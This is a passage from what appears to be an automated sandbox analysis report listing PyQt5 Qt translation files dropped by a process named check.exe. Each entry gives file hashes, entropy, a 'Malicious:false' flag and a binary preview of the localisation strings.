                                                                                                                                                                                                                                      MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                                                      SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                                                      SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                                                      SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_it.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10612
                                                                                                                                                                                                                                      Entropy (8bit):4.458970627057882
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                                                      MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                                                      SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                                                      SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                                                      SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_ja.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7917
                                                                                                                                                                                                                                      Entropy (8bit):5.680408580146589
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                                                      MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                                                      SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                                                      SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                                                      SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_ko.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5708
                                                                                                                                                                                                                                      Entropy (8bit):5.698914195742074
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                                                      MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                                                      SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                                                      SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                                                      SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_pl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9673
                                                                                                                                                                                                                                      Entropy (8bit):4.622652249027856
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                                                      MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                                                      SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                                                      SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                                                      SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_ru.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7288
                                                                                                                                                                                                                                      Entropy (8bit):5.297177914619657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                                                      MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                                                      SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                                                      SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                                                      SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_sk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                      Entropy (8bit):4.70568613551943
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                                                      MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                                                      SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                                                      SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                                                      SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_sl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10363
                                                                                                                                                                                                                                      Entropy (8bit):4.613473842638716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                                                      MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                                                      SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                                                      SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                                                      SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_tr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4629
                                                                                                                                                                                                                                      Entropy (8bit):4.68793836539357
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                                                      MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                                                      SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                                                      SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
                                                                                                                                                                                                                                      SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_uk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9750
                                                                                                                                                                                                                                      Entropy (8bit):5.281035122342072
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                                                      MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                                                      SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                                                      SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                                                      SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_zh_CN.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6441
                                                                                                                                                                                                                                      Entropy (8bit):5.790303416386852
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                                                      MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                                                      SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                                                      SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                                                      SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_zh_TW.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9301
                                                                                                                                                                                                                                      Entropy (8bit):5.80411750798786
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                                                      MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                                                      SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                                                      SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                                                      SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_hu.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                                                      MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                                                      SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                                                      SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                                                      SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_it.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                                                      MD5:2BB8C94D420D3BC344C79A01043BDC89
